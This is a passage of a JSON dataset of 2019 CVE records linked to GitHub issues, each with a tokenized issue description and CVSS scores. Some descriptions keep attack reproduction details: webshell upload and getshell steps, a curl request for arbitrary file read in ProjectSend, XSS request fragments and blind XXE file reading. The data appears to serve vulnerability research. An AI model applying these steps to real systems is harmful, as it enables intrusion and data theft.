  34449. "impactScore": 5.9,
  34450. "exploitabilityScore": 3.9
  34451. },
  34452. {
  34453. "CVE_ID": "CVE-2019-11376",
  34454. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/5",
  34455. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/5",
  34456. "Repo_new": "inunosinsi/soycms",
  34457. "Issue_Created_At": "2019-04-02T07:56:02Z",
  34458. "description": "There is one vulnerability that can APITAG arbitrary php code). There is one vulnerability that can APITAG arbitrary php code) Affected APITAG NUMBERTAG Type of APITAG arbitrary php code(can getshell) Discovered by: Ryan0lb First, we can install the cms successfully, and we can create a new website FILETAG we can insert arbitrary php code in the URLTAG FILETAG FILETAG APITAG can insert the malicious code, and getshell FILETAG",
  34459. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  34460. "severity": "HIGH",
  34461. "baseScore": 7.2,
  34462. "impactScore": 5.9,
  34463. "exploitabilityScore": 1.2
  34464. },
  34465. {
  34466. "CVE_ID": "CVE-2019-11377",
  34467. "Issue_Url_old": "https://github.com/vedees/wcms/issues/2",
  34468. "Issue_Url_new": "https://github.com/vedees/wcms/issues/2",
  34469. "Repo_new": "vedees/wcms",
  34470. "Issue_Created_At": "2019-04-03T06:57:24Z",
  34471. "description": "An Arbitrary File Upload Vulnerability in PATHTAG An Arbitrary File Upload Vulnerability in PATHTAG Affected software: WCMS NUMBERTAG Type of vulnerability: Arbitrary File Upload Discovered by: Ryan0lb Use this upload feature in the developer/finder\uff1a FILETAG and we can upload an arbitrary file to the web server, which allows attackers to upload malicious code FILETAG APITAG APITAG FILETAG code\uff1a FILETAG I hope you can fix it",
  34472. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34473. "severity": "HIGH",
  34474. "baseScore": 8.8,
  34475. "impactScore": 5.9,
  34476. "exploitabilityScore": 2.8
  34477. },
  34478. {
  34479. "CVE_ID": "CVE-2019-11378",
  34480. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/700",
  34481. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/700",
  34482. "Repo_new": "projectsend/projectsend",
  34483. "Issue_Created_At": "2019-04-18T03:50:31Z",
  34484. "description": "Security Flaw read and delete arbitrary files (accessible by www data) and run arbitrary code. Type This is a: [X] Bug report Description of the problem It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code. Watch video for detailed information: URLTAG List the steps to reproduce the issue NUMBERTAG Upload a file (e.g. APITAG NUMBERTAG Upload the same file again but don't save it after clicking APITAG NUMBERTAG Grab the PHPSESSIONID NUMBERTAG Run the following curl command: curl ' FILETAG H APITAG keep alive' H APITAG Control: max age NUMBERTAG H APITAG FILETAG H APITAG Insecure Requests NUMBERTAG H APITAG Type: application/x www form urlencoded' H APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG H APITAG PATHTAG / ; APITAG exchange;v=b3' H APITAG FILETAG H APITAG Encoding: gzip, deflate' H APITAG Language: en APITAG H APITAG APITAG data PATHTAG compressed This will create a file called \"own3d\" that will point to FILETAG , meaning the user can now download that file (and delete it if the file is writeable by www data). Then, IF the user has access to the APITAG server hosting APITAG user can: download and crack password hashes from tbl_users; make changes to tbl_options like: allowing for upload of arbitrary file extensions (e.g. php) changing the client options, allowing clients to delete files This will allow users to later delete arbitrary files (www data has write access to) and run arbitrary php code. Environment APITAG version: r NUMBERTAG php version NUMBERTAG APITAG version NUMBERTAG",
  34485. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34486. "severity": "HIGH",
  34487. "baseScore": 8.8,
  34488. "impactScore": 5.9,
  34489. "exploitabilityScore": 2.8
  34490. },
  34491. {
  34492. "CVE_ID": "CVE-2019-11387",
  34493. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359",
  34494. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1359",
  34495. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34496. "Issue_Created_At": "2019-04-15T17:25:57Z",
  34497. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
  34498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34499. "severity": "MEDIUM",
  34500. "baseScore": 5.3,
  34501. "impactScore": 1.4,
  34502. "exploitabilityScore": 3.9
  34503. },
  34504. {
  34505. "CVE_ID": "CVE-2019-11388",
  34506. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354",
  34507. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1354",
  34508. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34509. "Issue_Created_At": "2019-04-15T16:03:37Z",
  34510. "description": "APITAG Vulnerability High]. The vulnerable regular expression is located in APITAG on line ERRORTAG . APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
  34511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34512. "severity": "MEDIUM",
  34513. "baseScore": 5.3,
  34514. "impactScore": 1.4,
  34515. "exploitabilityScore": 3.9
  34516. },
  34517. {
  34518. "CVE_ID": "CVE-2019-11388",
  34519. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372",
  34520. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1372",
  34521. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34522. "Issue_Created_At": "2019-04-28T08:47:31Z",
  34523. "description": "Regarding the APITAG exploit strings & the un reproducibility. Hi there, I am submitting this issue as the team is unable to see any impact by using the \"exploit strings\" i provided. Look at the following regular expression: CODETAG This is indeed a very long regular expression to reverse into a string by hand when you are looking at tons of such regular expressions. However, the only vulnerable part of the regular expression is the following: APITAG This part will cause the regex engine to backtrack a lot because of the alternate and adjacent sub patterns and character classes matching the same characters. I focused only on finding vulnerabilities and not on writing exploits and that way, I was able to find and verify NUMBERTAG ulnerabilities under and hour. I assumed you guys would understand what I was trying to convey without making a ready to use exploit public, open to abuse. The strings I mentioned are exploits for the vulnerable parts of the regular expressions, they aren't complete attack vectors as I mentioned in my interview with Portswigger URLTAG : > The researcher added: \u201cIt should be noted that I haven\u2019t released the full exploit strings yet because the vulnerabilities still exist and can be abused. The exploits mentioned in my blog are just for the vulnerable parts of the regular expressions and won\u2019t have any effect on an implementation of APITAG I hope it makes sense now.",
  34524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34525. "severity": "MEDIUM",
  34526. "baseScore": 5.3,
  34527. "impactScore": 1.4,
  34528. "exploitabilityScore": 3.9
  34529. },
  34530. {
  34531. "CVE_ID": "CVE-2019-11389",
  34532. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356",
  34533. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1356",
  34534. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34535. "Issue_Created_At": "2019-04-15T16:13:02Z",
  34536. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and intersecting alternate patterns. It can be exploited with the following string APITAG",
  34537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34538. "severity": "MEDIUM",
  34539. "baseScore": 5.3,
  34540. "impactScore": 1.4,
  34541. "exploitabilityScore": 3.9
  34542. },
  34543. {
  34544. "CVE_ID": "CVE-2019-11390",
  34545. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358",
  34546. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1358",
  34547. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34548. "Issue_Created_At": "2019-04-15T17:01:38Z",
  34549. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string ERRORTAG PS: For some reason, I was unable to reproduce it in Python engine but it works perfectly with PHP APITAG via FILETAG and gives a complexity of about NUMBERTAG n.",
  34550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34551. "severity": "MEDIUM",
  34552. "baseScore": 5.3,
  34553. "impactScore": 1.4,
  34554. "exploitabilityScore": 3.9
  34555. },
  34556. {
  34557. "CVE_ID": "CVE-2019-11391",
  34558. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357",
  34559. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1357",
  34560. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34561. "Issue_Created_At": "2019-04-15T16:22:53Z",
  34562. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
  34563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34564. "severity": "MEDIUM",
  34565. "baseScore": 5.3,
  34566. "impactScore": 1.4,
  34567. "exploitabilityScore": 3.9
  34568. },
  34569. {
  34570. "CVE_ID": "CVE-2019-11401",
  34571. "Issue_Url_old": "https://github.com/siteserver/cms/issues/1858",
  34572. "Issue_Url_new": "https://github.com/siteserver/cms/issues/1858",
  34573. "Repo_new": "siteserver/cms",
  34574. "Issue_Created_At": "2019-04-12T14:26:53Z",
  34575. "description": "There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell.. After the administrator logged in and added a new extension of file such as \"aassp\". The administrator can upload a malicious file which extension is \"aassp\". After the file was filtered by the rule, the file extension will be changed to \" .asp\". Then the file will run as a webshell. FILETAG CODETAG The filtering rulle: APITAG The rule is so simple that replaces \"as\" . And the suggestion is: After replacied, add a judgement to enhance the filter that if \"as\" in extension of file then reject uploading.",
  34576. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  34577. "severity": "HIGH",
  34578. "baseScore": 7.2,
  34579. "impactScore": 5.9,
  34580. "exploitabilityScore": 1.2
  34581. },
  34582. {
  34583. "CVE_ID": "CVE-2019-11404",
  34584. "Issue_Url_old": "https://github.com/arrow-kt/arrow/issues/1310",
  34585. "Issue_Url_new": "https://github.com/arrow-kt/arrow/issues/1310",
  34586. "Repo_new": "arrow-kt/arrow",
  34587. "Issue_Created_At": "2019-02-19T13:37:39Z",
  34588. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
  34589. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34590. "severity": "MEDIUM",
  34591. "baseScore": 5.9,
  34592. "impactScore": 3.6,
  34593. "exploitabilityScore": 2.2
  34594. },
  34595. {
  34596. "CVE_ID": "CVE-2019-11404",
  34597. "Issue_Url_old": "https://github.com/arrow-kt/ank/issues/35",
  34598. "Issue_Url_new": "https://github.com/arrow-kt/ank/issues/35",
  34599. "Repo_new": "arrow-kt/ank",
  34600. "Issue_Created_At": "2019-02-19T21:46:56Z",
  34601. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
  34602. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34603. "severity": "MEDIUM",
  34604. "baseScore": 5.9,
  34605. "impactScore": 3.6,
  34606. "exploitabilityScore": 2.2
  34607. },
  34608. {
  34609. "CVE_ID": "CVE-2019-11405",
  34610. "Issue_Url_old": "https://github.com/OpenAPITools/openapi-generator/issues/2253",
  34611. "Issue_Url_new": "https://github.com/openapitools/openapi-generator/issues/2253",
  34612. "Repo_new": "openapitools/openapi-generator",
  34613. "Issue_Created_At": "2019-02-27T14:13:28Z",
  34614. "description": "FILETAG FILETAG This project is generating starter projects that are resolving dependencies over HTTP instead of HTTPS. Additionally, the sample associated with this project are vulnerable to this as well. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG URLTAG URLTAG There are definately more locations that I've listed here. I know that MENTIONTAG has caught many of them here NUMBERTAG I just ask that the team take an extra sweep to check for this anywhere else and be aware of it in future PR's. Public Disclosure This issue requires public disclosure as it impacts users that have used this project to generate their starter projects. A project maintainer needs to file for a CVE number to inform the public about this vulnerability. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG",
  34615. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  34616. "severity": "HIGH",
  34617. "baseScore": 7.4,
  34618. "impactScore": 5.2,
  34619. "exploitabilityScore": 2.2
  34620. },
  34621. {
  34622. "CVE_ID": "CVE-2019-11406",
  34623. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/821",
  34624. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/821",
  34625. "Repo_new": "intelliants/subrion",
  34626. "Issue_Created_At": "2019-04-21T17:35:42Z",
  34627. "description": "Subrion CMS NUMBERTAG allows PATHTAG XSS via the name, email, or phone parameter. > APITAG Information] > Exploit Title: APITAG CMS NUMBERTAG SS] > Date NUMBERTAG Exploit Author: APITAG Alorf twitter: APITAG > Vendor Homepage: [ URLTAG > Software Link: [ URLTAG > Version NUMBERTAG Tested on: APITAG > > Vulnerable paramters: > > parameter: name. > parameter: email. > parameter: phone. > > > APITAG > > > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > Upgrade Insecure Requests NUMBERTAG APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > Subrion CMS NUMBERTAG APITAG Component] > parameter: name. > parameter: email. > parameter: phone. > In contact page > > > > APITAG Type Other] > XSS > > > > APITAG Code execution] > true > > > > APITAG Vectors] > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > > APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG > URLTAG Use CVETAG .",
  34628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34629. "severity": "MEDIUM",
  34630. "baseScore": 6.1,
  34631. "impactScore": 2.7,
  34632. "exploitabilityScore": 2.8
  34633. },
  34634. {
  34635. "CVE_ID": "CVE-2019-11426",
  34636. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/64",
  34637. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/64",
  34638. "Repo_new": "idreamsoft/iCMS",
  34639. "Issue_Created_At": "2019-04-18T01:38:46Z",
  34640. "description": "ICMS NUMBERTAG Reflect Cross Site Scripting Vulnerabilities. First one APITAG Second one APITAG View details FILETAG sysorem.li APITAG",
  34641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34642. "severity": "MEDIUM",
  34643. "baseScore": 6.1,
  34644. "impactScore": 2.7,
  34645. "exploitabilityScore": 2.8
  34646. },
  34647. {
  34648. "CVE_ID": "CVE-2019-11428",
  34649. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/139",
  34650. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/139",
  34651. "Repo_new": "mkucej/i-librarian",
  34652. "Issue_Created_At": "2019-04-18T09:45:37Z",
  34653. "description": "XSS vulnerability in FILETAG . Summary The parameter export_files is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. POC URLTAG \"> APITAG alert NUMBERTAG APITAG Detail APITAG then, $get_pos_export_files was printed without escaping APITAG",
  34654. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34655. "severity": "MEDIUM",
  34656. "baseScore": 6.1,
  34657. "impactScore": 2.7,
  34658. "exploitabilityScore": 2.8
  34659. },
  34660. {
  34661. "CVE_ID": "CVE-2019-11449",
  34662. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/140",
  34663. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/140",
  34664. "Repo_new": "mkucej/i-librarian",
  34665. "Issue_Created_At": "2019-04-18T15:18:33Z",
  34666. "description": "Stored XSS in FILETAG . Summary The parameter APITAG is not sanitized after querying from database, so attackers can create a stored XSS attack. How to reproduce NUMBERTAG APITAG NUMBERTAG in your browser, access APITAG while logged in Detail The bug exists since APITAG was assigned to result of database query without sanitizing URLTAG URLTAG",
  34667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34668. "severity": "MEDIUM",
  34669. "baseScore": 6.1,
  34670. "impactScore": 2.7,
  34671. "exploitabilityScore": 2.8
  34672. },
  34673. {
  34674. "CVE_ID": "CVE-2019-11463",
  34675. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1165",
  34676. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1165",
  34677. "Repo_new": "libarchive/libarchive",
  34678. "Issue_Created_At": "2019-03-28T17:41:33Z",
  34679. "description": "Memory leak when decoding LZMA. I've encountered a memory leak while fuzzing libarchive. A NUMBERTAG byte reproducer input is attached: FILETAG . Do not extract this zip file it is the fuzzed input itself. To reproduce, build latest libarchive with ASAN ( APITAG ) and run: ERRORTAG Without ASAN, this can also be reproduced using Valgrind: ERRORTAG",
  34680. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34681. "severity": "MEDIUM",
  34682. "baseScore": 5.5,
  34683. "impactScore": 3.6,
  34684. "exploitabilityScore": 1.8
  34685. },
  34686. {
  34687. "CVE_ID": "CVE-2019-11471",
  34688. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/123",
  34689. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/123",
  34690. "Repo_new": "strukturag/libheif",
  34691. "Issue_Created_At": "2019-04-14T12:30:34Z",
  34692. "description": "APITAG heap use after free at APITAG As of dcbfa NUMBERTAG APITAG may report a heap use after free error when libheif is compiled with APITAG ERRORTAG zipped POCs: FILETAG",
  34693. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34694. "severity": "HIGH",
  34695. "baseScore": 8.8,
  34696. "impactScore": 5.9,
  34697. "exploitabilityScore": 2.8
  34698. },
  34699. {
  34700. "CVE_ID": "CVE-2019-11472",
  34701. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1546",
  34702. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1546",
  34703. "Repo_new": "imagemagick/imagemagick",
  34704. "Issue_Created_At": "2019-04-14T07:21:12Z",
  34705. "description": "FPE errors when reading XWD images. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When using APITAG on XWD files, it may emit FPE errors at multiple locations. Steps to Reproduce run APITAG ASAN messages may be like: APITAG ERRORTAG APITAG ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected in APITAG but I found this also happens in APITAG NUMBERTAG POCs: FILETAG",
  34706. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34707. "severity": "MEDIUM",
  34708. "baseScore": 6.5,
  34709. "impactScore": 3.6,
  34710. "exploitabilityScore": 2.8
  34711. },
  34712. {
  34713. "CVE_ID": "CVE-2019-11490",
  34714. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1568",
  34715. "Issue_Url_new": "https://github.com/nmap/npcap/issues/308",
  34716. "Repo_new": "nmap/npcap",
  34717. "Issue_Created_At": "2019-04-22T20:48:04Z",
  34718. "description": "Npcap NUMBERTAG Pool Corruption. Description: Sending a malformed .pcap with npcap loopback adapter causes kernel pool corruption. Analysis: When sending a malformed .pcap file with the npcap loopback adapter using either APITAG or APITAG results in kernel pool corruption. This vulnerability could lead to arbitrary code executing inside the Windows kernel and allow elevation of privileges. Version: npcap NUMBERTAG Tested on: Windows NUMBERTAG ERRORTAG FILETAG",
  34719. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34720. "severity": "HIGH",
  34721. "baseScore": 7.8,
  34722. "impactScore": 5.9,
  34723. "exploitabilityScore": 1.8
  34724. },
  34725. {
  34726. "CVE_ID": "CVE-2019-11498",
  34727. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/67",
  34728. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/67",
  34729. "Repo_new": "dbry/wavpack",
  34730. "Issue_Created_At": "2019-03-04T19:43:54Z",
  34731. "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit config.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
  34732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34733. "severity": "MEDIUM",
  34734. "baseScore": 6.5,
  34735. "impactScore": 3.6,
  34736. "exploitabilityScore": 2.8
  34737. },
  34738. {
  34739. "CVE_ID": "CVE-2019-11519",
  34740. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/3713",
  34741. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/3713",
  34742. "Repo_new": "nopsolutions/nopcommerce",
  34743. "Issue_Created_At": "2019-04-24T03:05:15Z",
  34744. "description": "XXE processing. I believe I have found a zero day which allows an attacker to read files of the server by uploading a XML file in the following: Configurations > Languages > Edit Language > Import Resources > Upload XML file to perform XXE attack and read files of the server. I used Burp Collaborator to read the files and its content since it is a blind XXE Source: FILETAG",
  34745. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  34746. "severity": "MEDIUM",
  34747. "baseScore": 4.9,
  34748. "impactScore": 3.6,
  34749. "exploitabilityScore": 1.2
  34750. },
  34751. {
  34752. "CVE_ID": "CVE-2019-11596",
  34753. "Issue_Url_old": "https://github.com/memcached/memcached/issues/474",
  34754. "Issue_Url_new": "https://github.com/memcached/memcached/issues/474",
  34755. "Repo_new": "memcached/memcached",
  34756. "Issue_Created_At": "2019-04-10T10:38:46Z",
  34757. "description": "segfault (null pointer dereference) during lru command handling. Dear memcached team \u2014 I have detected a SIGSEGV during the lru command handling. Version APITAG How to reproduce Start memcached APITAG Send malicious payload via nc: APITAG ASAN ERRORTAG Please let me know what additional information I can provide to successfully reproduce the issue.",
  34758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34759. "severity": "HIGH",
  34760. "baseScore": 7.5,
  34761. "impactScore": 3.6,
  34762. "exploitabilityScore": 3.9
  34763. },
  34764. {
  34765. "CVE_ID": "CVE-2019-11597",
  34766. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1555",
  34767. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1555",
  34768. "Repo_new": "imagemagick/imagemagick",
  34769. "Issue_Created_At": "2019-04-27T13:08:13Z",
  34770. "description": "heap_buffer_overflow in APITAG of coders/tiff.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  34771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  34772. "severity": "HIGH",
  34773. "baseScore": 8.1,
  34774. "impactScore": 5.2,
  34775. "exploitabilityScore": 2.8
  34776. },
  34777. {
  34778. "CVE_ID": "CVE-2019-11598",
  34779. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1540",
  34780. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1540",
  34781. "Repo_new": "imagemagick/imagemagick",
  34782. "Issue_Created_At": "2019-04-08T03:10:13Z",
  34783. "description": "heap buffer overflow in APITAG of coders/pnm.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/pnm.c. Steps to Reproduce APITAG",
  34784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  34785. "severity": "HIGH",
  34786. "baseScore": 8.1,
  34787. "impactScore": 5.2,
  34788. "exploitabilityScore": 2.8
  34789. },
  34790. {
  34791. "CVE_ID": "CVE-2019-11632",
  34792. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5529",
  34793. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5529",
  34794. "Repo_new": "octopusdeploy/issues",
  34795. "Issue_Created_At": "2019-05-01T05:15:06Z",
  34796. "description": "(LTS NUMBERTAG ariable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are 